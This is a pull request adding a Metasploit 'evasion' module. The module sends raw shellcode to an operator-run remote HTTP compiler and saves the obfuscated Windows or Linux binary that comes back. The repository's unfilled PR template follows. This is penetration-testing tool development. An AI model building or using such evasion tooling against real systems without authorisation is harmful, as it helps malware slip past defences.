### PR TITLE
Add remote HTTP compiler evasion module (spike)

### DIFF
--- a/modules/evasion/multi/http/compiler.rb
+++ b/modules/evasion/multi/http/compiler.rb
@@ -1,0 +1,99 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Evasion
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name'        => 'Remote HTTP Compiler Evasion',
+        'Description' => %q{
+          Spikes out a remote compiler workflow for evasion.  Rather than
+          relying on a locally installed toolchain, this module sends the
+          raw shellcode to a user-operated remote HTTP compiler service
+          that returns an obfuscated native binary for the chosen target
+          platform and architecture.
+
+          Point RHOST/RPORT at the remote compiler service.  The service
+          must accept a JSON POST at COMPILER_URI containing a
+          base64-encoded payload, platform, arch, and format fields, and
+          respond with the compiled binary as application/octet-stream.
+        },
+        'Author'        => ['Nipun Weerasinghe'],
+        'License'       => MSF_LICENSE,
+        'Platform'      => %w[win linux],
+        'Arch'          => [ARCH_X86, ARCH_X64, ARCH_AARCH64],
+        'Targets'       => [
+          ['Windows x86',   { 'Platform' => 'win',   'Arch' => ARCH_X86,    'Format' => 'exe' }],
+          ['Windows x64',   { 'Platform' => 'win',   'Arch' => ARCH_X64,    'Format' => 'exe' }],
+          ['Linux x86',     { 'Platform' => 'linux', 'Arch' => ARCH_X86,    'Format' => 'elf' }],
+          ['Linux x64',     { 'Platform' => 'linux', 'Arch' => ARCH_X64,    'Format' => 'elf' }],
+          ['Linux aarch64', { 'Platform' => 'linux', 'Arch' => ARCH_AARCH64, 'Format' => 'elf' }]
+        ],
+        'DefaultTarget' => 3
+      )
+    )
+
+    register_options([
+      Opt::RHOST,
+      Opt::RPORT(8080),
+      OptString.new('COMPILER_URI', [true, 'Remote compiler API endpoint path', '/api/compile']),
+      OptString.new('FILENAME',     [true, 'Output filename', 'payload.bin'])
+    ])
+  end
+
+  def run
+    raw_payload = payload.encoded
+    if raw_payload.blank?
+      fail_with(Failure::BadConfig, 'Failed to generate payload')
+    end
+
+    print_status("Sending #{raw_payload.length}-byte payload to remote compiler at #{peer}")
+
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri'    => normalize_uri(datastore['COMPILER_URI']),
+      'ctype'  => 'application/json',
+      'data'   => build_compiler_request(raw_payload)
+    )
+
+    validate_response!(res)
+
+    compiled = res.body
+    print_status("Received compiled binary: #{compiled.length} bytes")
+
+    File.binwrite(datastore['FILENAME'], compiled)
+    File.chmod(0o755, datastore['FILENAME']) if target['Platform'] == 'linux'
+    print_good("Saved to: #{datastore['FILENAME']}")
+  end
+
+  private
+
+  def build_compiler_request(raw_payload)
+    {
+      'payload'  => Rex::Text.encode_base64(raw_payload).strip,
+      'platform' => target['Platform'],
+      'arch'     => target['Arch'],
+      'format'   => target['Format']
+    }.to_json
+  end
+
+  def validate_response!(res)
+    if res.nil?
+      fail_with(Failure::Unreachable, "No response from compiler at #{peer}")
+    end
+
+    unless res.code == 200
+      fail_with(Failure::UnexpectedReply, "Compiler returned HTTP #{res.code}: #{res.message}")
+    end
+
+    if res.body.blank?
+      fail_with(Failure::UnexpectedReply, 'Compiler returned an empty response body')
+    end
+  end
+end


### PR DESCRIPTION
  Introduce evasion/multi/http/compiler, a proof-of-concept module that
  offloads payload compilation to a user-operated remote HTTP service
  instead of relying on a local toolchain.

  The module POSTs a JSON request containing the base64-encoded shellcode,
  target platform, arch, and format to the configured compiler endpoint,
  then saves the returned obfuscated binary to disk. Supports Windows
  (x86/x64) and Linux (x86/x64/aarch64) targets.

  Closes #21163

Tell us what this change does. If you're fixing a bug, please mention
the github issue number.

Please ensure you are submitting **from a unique branch** in your [repository](https://github.com/rapid7/metasploit-framework/pull/11086#issuecomment-445506416) to master in Rapid7's.

## Verification

List the steps needed to make sure this thing works

- [ ] Start `msfconsole`
- [ ] `use exploit/windows/smb/ms08_067_netapi`
- [ ] ...
- [ ] **Verify** the thing does what it should
- [ ] **Verify** the thing does not do what it should not
- [ ] **Document** the thing and how it works ([Example](https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/post/multi/gather/aws_keys.md))

If you are opening a PR for a new module that exploits a **specific** piece of hardware or requires a **complex or hard-to-find** testing environment, we recommend that you send us a demo of your module executing correctly. Seeing your module in action will help us review your PR faster!

Specific Hardware Examples:
* Switches
* Routers
* IP Cameras
* IoT devices

Complex Software Examples:
* Expensive proprietary software
* Software with an extensive installation process
* Software that requires exploit testing across multiple significantly different versions
* Software without an English language UI

We will also accept demonstrations of successful module execution even if your module doesn't meet the above conditions. It's not a necessity, but it may help us land your module faster!

Demonstration of successful module execution can take the form of a packet capture (pcap) or a screen recording. You can send pcaps and recordings to [msfdev@metasploit.com](mailto:msfdev@metasploit.com). Please include a CVE number in the subject header (if applicable), and a link to your PR in the email body.
If you wish to sanitize your pcap, please see the [wiki](https://docs.metasploit.com/docs/development/get-started/sanitizing-pcaps.html).
